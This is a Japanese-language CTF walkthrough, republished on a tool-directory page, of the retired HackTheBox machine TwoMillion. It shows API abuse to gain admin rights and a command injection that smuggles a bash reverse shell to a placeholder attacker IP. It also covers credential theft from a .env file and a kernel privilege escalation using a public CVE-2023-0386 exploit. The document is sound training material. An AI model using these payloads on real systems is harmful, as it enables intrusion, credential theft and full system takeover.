Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
HTB-TwoMillion-Writeup — HackTheBox TwoMillion マシンの writeup — API 悪用、コマンドインジェクション & CVE-2023-0386 | Kitploit
ツール/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
特権昇格偵察脆弱性分析エクスプロイト横移動ウェブアプリケーション悪用ポストエクスプロイトCTFペネトレーションテスト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
コマンド&コントロール
学習と教育
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

HackTheBox TwoMillion マシンの writeup — API 悪用、コマンドインジェクション & CVE-2023-0386

リポジトリを見る
4ヶ月前未レビュー

HTB-TwoMillion-Writeup

HackTheBox TwoMillion マシンの攻略記事 — API 悪用、コマンドインジェクション & CVE-2023-0386

HackTheBox — TwoMillion 攻略記事

HackTheBox — TwoMillion 攻略記事

HTB Difficulty OS

マシン情報

項目詳細
名前TwoMillion
難易度簡単
OSLinux
IP10.10.11.221
CVECVE-2023-0386

概要

TwoMillion は、旧 HackTheBox プラットフォームをテーマにした Easy な Linux マシンです。招待コードのデコード、API エンドポイントの悪用、OS コマンドインジェクション、資格情報の発見、CVE-2023-0386 (OverlayFS) を介した Linux カーネルの権限昇格を含みます。


情報収集

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

開放ポート:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → 2million.htb にリダイレクト

/etc/hosts に追加:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

ステップ1 — 招待コード

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

レスポンスは ROT13 エンコードされています。デコード:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

招待コードを生成:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

デコードした招待コードを使って http://2million.htb/register に登録します。


ステップ2 — API 悪用 → 管理者権限

ブラウザでログインし、Cookie から PHPSESSID を取得 (F12 → Application → Cookies)。

管理者に昇格:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

確認:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

ステップ3 — コマンドインジェクション → リバースシェル

リスナーを起動:

root@kitploit:~
nc -lvnp 4444

リバースシェルのペイロードを送信:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

www-data としてシェルを取得。


ステップ4 — ユーザーフラグ

.env から認証情報を探す:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

SSH でログイン:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

ステップ5 — ルートフラグ (CVE-2023-0386)

ヒントを確認:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable to CVE-2023-0386

Kali でエクスプロイトをダウンロードしてコンパイル:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

ターゲットに転送:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Target
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

ターゲット上で2つの端末で実行:

Terminal 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

Terminal 2:

root@kitploit:~
./exp

ルートフラグを取得:

root@kitploit:~
cat /root/root.txt

攻撃チェーン


使用ツール

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

この攻略記事は、リタイアされた HackTheBox マシンにおける教育目的のみのものです。

ツールをダウンロード
ステップ手法
偵察Nmap scan
招待コードROT13 + Base64 decode
Web 権限昇格API 操作 → 管理者
初期シェルOS command injection
横方向移動.env の認証情報 → SSH
ルートCVE-2023-0386 OverlayFS exploit